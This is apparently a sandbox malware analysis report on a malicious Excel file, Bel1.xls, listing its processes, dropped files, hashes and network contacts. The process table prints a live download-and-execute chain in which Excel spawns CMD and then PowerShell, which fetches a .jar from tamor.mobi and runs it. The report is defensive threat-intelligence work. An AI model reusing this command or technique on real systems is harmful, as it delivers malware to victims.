File name: | Bel1.xls |
Full analysis: | https://app.any.run/tasks/c3584f83-51fd-4bc0-9aa5-18d21e661b66 |
Verdict: | Malicious activity |
Analysis date: | January 22, 2019, 17:07:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 063E29A61BC44440F184591C9E8F66AA |
SHA1: | 4ABD7D99CA5F560766AFA3B2F6A72CC917593891 |
SHA256: | 05050073506003FEE0E35F84C064203B972EB58873582A5CEDF4982CB20D43D0 |
SSDEEP: | 1536:Iuuuq3QoQQFVxxulLhRRRXAAEllutjTL/qSeLzzzQmmsuuuHrrtooY:mQoQQFVxxv3utT/5rr8 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2948 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3716 | CMD.EXE /c powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://tamor.mobi\" ,\" %temp%\\2NWKwq.jar\") }" & %temp%\\2NWKwq.jar | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2256 | powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://tamor.mobi\" ,\" C:\Users\admin\AppData\Local\Temp\\2NWKwq.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3484 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\2NWKwq.jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | — | CMD.EXE |
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Version: 8.0.920.14 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2948 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6A34.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XV67XHUHF7QNN1S2YDMG.temp | — | |
MD5:— | SHA256:— | |||
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF24ac9c.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2256 | powershell.exe | C:\Users\admin\AppData\Local\Temp\2NWKwq.jar | text | |
MD5:13325E5793A9E1CDFD7374D1B2B6B535 | SHA256:AF42F553D04333B4ECCA0182DAEB242229668696EA0211F8C4D88F6608A1760F | |||
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2948 | EXCEL.EXE | C:\Users\admin\Documents\My Data Sources\DESKTOP.INI | ini | |
MD5:466AFDBDD30770A1A6B47AFD85099E82 | SHA256:D63E228A2173E58FA14818AAF610E9E6676D2D9836C5C2ED83BA6A783B7BB999 | |||
2948 | EXCEL.EXE | C:\Users\admin\Documents\My Data Sources\+Connect to New Data Source.odc | html | |
MD5:16A8A9A2B0A8B65FAF28E1007DB6733F | SHA256:3A13080059292811E5AC3F9E8B04B2C8EEA95D6A5538116AD751D11C834E6056 | |||
2948 | EXCEL.EXE | C:\Users\admin\Documents\My Data Sources\+NewSQLServerConnection.odc | html | |
MD5:149E8C684B9EA9887DD2E7E596E7187C | SHA256:43B12E68FB3B5BCC4099D796FA670A62B116A894437454A20050661DEF9D8816 | |||
2948 | EXCEL.EXE | C:\Users\admin\Documents\My Data Sources\FOLDER.ICO | image | |
MD5:A6DDCCFDAD18D5CA7AAEB168B6D02253 | SHA256:3114451F95C7FB8D7D884A19C724F6C7FF906B6D9BEC1BF7C6300D2CCA4F43A6 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2256 | powershell.exe | GET | 200 | 94.23.170.118:80 | http://tamor.mobi/ | CZ | text | 92 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2256 | powershell.exe | 94.23.170.118:80 | tamor.mobi | OVH SAS | CZ | suspicious |
Domain | IP | Reputation |
---|---|---|
tamor.mobi |
| unknown |